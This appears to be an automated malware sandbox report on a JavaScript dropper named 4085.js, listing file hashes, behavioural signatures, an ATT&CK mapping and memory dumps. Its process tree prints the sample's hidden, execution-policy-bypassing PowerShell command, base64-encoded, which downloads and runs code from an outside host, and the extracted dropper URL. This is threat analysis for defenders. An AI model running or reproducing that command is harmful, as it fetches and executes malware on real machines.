Overview

overview

10

Static

static

4085.js

windows7_x64

10

4085.js

windows10_x64

10

Analysis

  • max time kernel
    11s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    10-08-2021 06:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4085.js

  • Size

    776KB

  • MD5

    b6e9c6f1113c92ad6757266ae75769a2

  • SHA1

    9190e8d268db4deb7cd97624b17cba6617244699

  • SHA256

    9fca4b9bb2238dec26fc6b6161dc9d62647883966f1cfd661537fb8c097ff4fe

  • SHA512

    1684c2350b540da9326159455cb57937a2fefc1b97f1231c12cc66ffa601f71ce52096d5c37737d644c49b1c9ae7b5e33eb86890b1405a79d2aa364afbc1f09b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\4085.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/768-60-0x0000000000000000-mapping.dmp
    Download
  • memory/768-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
    Filesize

    8KB

    Download
  • memory/768-62-0x0000000002360000-0x0000000002361000-memory.dmp
    Filesize

    4KB

    Download
  • memory/768-63-0x000000001AC80000-0x000000001AC81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/768-64-0x00000000023B0000-0x00000000023B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/768-65-0x00000000024E0000-0x00000000024E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/768-67-0x000000001AC04000-0x000000001AC06000-memory.dmp
    Filesize

    8KB

    Download
  • memory/768-66-0x000000001AC00000-0x000000001AC02000-memory.dmp
    Filesize

    8KB

    Download
  • memory/768-68-0x000000001C500000-0x000000001C501000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1652-59-0x0000000000000000-mapping.dmp
    Download